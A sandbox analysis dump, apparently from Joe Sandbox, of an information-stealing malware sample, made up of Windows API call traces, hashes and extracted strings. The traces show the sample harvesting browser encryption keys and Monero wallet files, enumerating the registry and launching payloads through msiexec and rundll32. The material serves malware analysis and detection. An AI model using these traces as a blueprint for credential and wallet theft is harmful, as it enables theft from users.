                                      • CloseHandle.KERNEL32(00000000), ref: 0091D103
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                      • String ID:
                                      • API String ID: 3555725114-3916222277
                                      • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                      • Instruction ID: 7ac9c652bf5b778ca5f3efec4437a082f765d0857a83f35d9ab196362f66751d
                                      • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                      • Instruction Fuzzy Hash: E3E10D76900218EFCB14EFA0ED92FEEB779AF94700F004169F146A2195DF346A89CF61
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,009DAF10,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                      • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                      • StrStrA.SHLWAPI(?,009DAF28,00420B52), ref: 0040CAF7
                                      • StrStrA.SHLWAPI(00000000,009DAF58), ref: 0040CB1E
                                      • StrStrA.SHLWAPI(?,009DB900,00000000,?,00421458,00000000,?,00000000,00000000,?,009A94D0,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                      • StrStrA.SHLWAPI(00000000,009DB940), ref: 0040CCB9
                                        • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                        • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,009A95A0), ref: 0040C871
                                        • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                        • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                      • StrStrA.SHLWAPI(?,009DB940,00000000,?,0042145C,00000000,?,00000000,009A95A0), ref: 0040CD5A
                                      • StrStrA.SHLWAPI(00000000,009A96A0), ref: 0040CD71
                                        • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                        • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                        • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                      • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                      • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                      • String ID:
                                      • API String ID: 3555725114-3916222277
                                      • Opcode ID: ab42b5dea98dda6d1ec903180b661801f10a54a23581749008f7fe7b71c2160c
                                      • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                      • Opcode Fuzzy Hash: ab42b5dea98dda6d1ec903180b661801f10a54a23581749008f7fe7b71c2160c
                                      • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • RegOpenKeyExA.ADVAPI32(00000000,009D8660,00000000,00020019,00000000,004205B6), ref: 004183A4
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                      • wsprintfA.USER32 ref: 00418459
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                                      • String ID: - $%s\%s$?
                                      • API String ID: 3246050789-3278919252
                                      • Opcode ID: be8ddf1fe9dc456048681201925a0f877c5bcd284375678f65f072a6cae44d7f
                                      • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                                      • Opcode Fuzzy Hash: be8ddf1fe9dc456048681201925a0f877c5bcd284375678f65f072a6cae44d7f
                                      • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • memset.MSVCRT ref: 00410C1C
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                      • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                      • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                      • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                      • lstrlenA.KERNEL32(?), ref: 00410CA7
                                      • memset.MSVCRT ref: 00410CCD
                                      • memset.MSVCRT ref: 00410CE1
                                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,009A94C0,?,0042110C,?,00000000), ref: 0041A82B
                                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,009D6878,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                      • String ID: .exe
                                      • API String ID: 1395395982-4119554291
                                      • Opcode ID: 77704baf693414c0c6232ee0e38bb13a65318062e1f1704c2aae0d7082b93def
                                      • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                      • Opcode Fuzzy Hash: 77704baf693414c0c6232ee0e38bb13a65318062e1f1704c2aae0d7082b93def
                                      • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateGlobalStream
                                      • String ID: image/jpeg
                                      • API String ID: 2244384528-3785015651
                                      • Opcode ID: c966b1d2bff0186d16334794f0ecdb2948fd0a8507f778a3f9c1e08f5450a090
                                      • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                                      • Opcode Fuzzy Hash: c966b1d2bff0186d16334794f0ecdb2948fd0a8507f778a3f9c1e08f5450a090
                                      • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                      APIs
                                      • strtok_s.MSVCRT ref: 00411307
                                      • strtok_s.MSVCRT ref: 00411750
                                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,009A94C0,?,0042110C,?,00000000), ref: 0041A82B
                                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strtok_s$lstrcpylstrlen
                                      • String ID:
                                      • API String ID: 348468850-0
                                      • Opcode ID: c36c6220a1731f690f2bad5fcd02e57531a13a3029cc92974acfb62a5780bfb7
                                      • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                      • Opcode Fuzzy Hash: c36c6220a1731f690f2bad5fcd02e57531a13a3029cc92974acfb62a5780bfb7
                                      • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExecuteShell$lstrcpy
                                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                      • API String ID: 2507796910-3625054190
                                      • Opcode ID: 154c5dc731ad3e96d902aef29615356604d56b336ceddfc02004fe10789c21fa
                                      • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                      • Opcode Fuzzy Hash: 154c5dc731ad3e96d902aef29615356604d56b336ceddfc02004fe10789c21fa
                                      • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                                      APIs
                                      • memset.MSVCRT ref: 00924505
                                      • memset.MSVCRT ref: 0092451C
                                        • Part of subcall function 00929047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00929072
                                      • lstrcat.KERNEL32(?,00000000), ref: 00924553
                                      • lstrcat.KERNEL32(?,0064A30C), ref: 00924572
                                      • lstrcat.KERNEL32(?,?), ref: 00924586
                                      • lstrcat.KERNEL32(?,0064A5D8), ref: 0092459A
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                        • Part of subcall function 00928FF7: GetFileAttributesA.KERNEL32(00000000,?,00911DBB,?,?,0042565C,?,?,00420E1F), ref: 00929006
                                        • Part of subcall function 00919F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 00919FA0
                                        • Part of subcall function 00919F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 00919FF9
                                        • Part of subcall function 00919C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00919C53
                                        • Part of subcall function 00919C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919C78
                                        • Part of subcall function 00919C27: LocalAlloc.KERNEL32(00000040,?), ref: 00919C98
                                        • Part of subcall function 00919C27: ReadFile.KERNEL32(000000FF,?,00000000,009116F6,00000000), ref: 00919CC1
                                        • Part of subcall function 00919C27: LocalFree.KERNEL32(009116F6), ref: 00919CF7
                                        • Part of subcall function 00919C27: CloseHandle.KERNEL32(000000FF), ref: 00919D01
                                        • Part of subcall function 00929627: GlobalAlloc.KERNEL32(00000000,00924644,00924644), ref: 0092963A
                                      • StrStrA.SHLWAPI(?,0064A0D8), ref: 0092465A
                                      • GlobalFree.KERNEL32(?), ref: 00924779
                                        • Part of subcall function 00919D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00915155,00000000,00000000), ref: 00919D56
                                        • Part of subcall function 00919D27: LocalAlloc.KERNEL32(00000040,?,?,?,00915155,00000000,?), ref: 00919D68
                                        • Part of subcall function 00919D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00915155,00000000,00000000), ref: 00919D91
                                        • Part of subcall function 00919D27: LocalFree.KERNEL32(?,?,?,?,00915155,00000000,?), ref: 00919DA6
                                        • Part of subcall function 0091A077: memcmp.MSVCRT(?,00421264,00000003), ref: 0091A094
                                      • lstrcat.KERNEL32(?,00000000), ref: 0092470A
                                      • StrCmpCA.SHLWAPI(?,004208D1), ref: 00924727
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00924739
                                      • lstrcat.KERNEL32(00000000,?), ref: 0092474C
                                      • lstrcat.KERNEL32(00000000,00420FB8), ref: 0092475B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                      • String ID:
                                      • API String ID: 1191620704-0
                                      • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                      • Instruction ID: a9f5c31852513a90d2f47367de8f08ea70d1c58fd9c97b7ffb87f6202219439f
                                      • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                      • Instruction Fuzzy Hash: 487131B6A00218BBDB14EBE0EC85FEE7379AF89300F008598F60596185DB75DB59CB91
                                      APIs
                                      • memset.MSVCRT ref: 0041429E
                                      • memset.MSVCRT ref: 004142B5
                                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                      • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                      • lstrcatA.KERNEL32(?,009DAE08), ref: 0041430B
                                      • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                      • lstrcatA.KERNEL32(?,009DB210), ref: 00414333
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                        • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                        • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                        • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                        • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                        • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                        • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                        • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                        • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                        • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                      • StrStrA.SHLWAPI(?,009DC160), ref: 004143F3
                                      • GlobalFree.KERNEL32(?), ref: 00414512
                                        • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                        • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                        • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                        • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                        • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                      • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                      • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                      • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                      • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                      • String ID:
                                      • API String ID: 1191620704-0
                                      • Opcode ID: da017c058fb2f294138a0ea1b89b15030ef27b9e8023dbd69d578e4640a9d96b
                                      • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                      • Opcode Fuzzy Hash: da017c058fb2f294138a0ea1b89b15030ef27b9e8023dbd69d578e4640a9d96b
                                      • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                      APIs
                                      • memset.MSVCRT ref: 00401327
                                        • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                        • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                        • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                        • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                        • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                      • lstrlenA.KERNEL32(?), ref: 0040135C
                                      • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,009D6878,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                        • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                        • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                        • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                        • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                        • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                      • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                      • memset.MSVCRT ref: 00401516
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                      • API String ID: 1930502592-218353709
                                      • Opcode ID: 8f1af44f0471db40cbeeb3acc638c17ebe6dcb10dd0f8b1439207695b066911b
                                      • Instruction ID: 674d48b949cffd92695f0a4f51b6d393b2dd06dcaa63b8f6d50fb5eb71b8da29
                                      • Opcode Fuzzy Hash: 8f1af44f0471db40cbeeb3acc638c17ebe6dcb10dd0f8b1439207695b066911b
                                      • Instruction Fuzzy Hash: AA5164B195011897CB15FB61DD91BED733CAF54304F4041ADB60A62091EE385BDACBAA
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                        • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,009DC7A8), ref: 00406303
                                        • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                        • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,009DC178,00000000,00000000,00400100,00000000), ref: 00406385
                                        • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                        • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                      • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                        • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
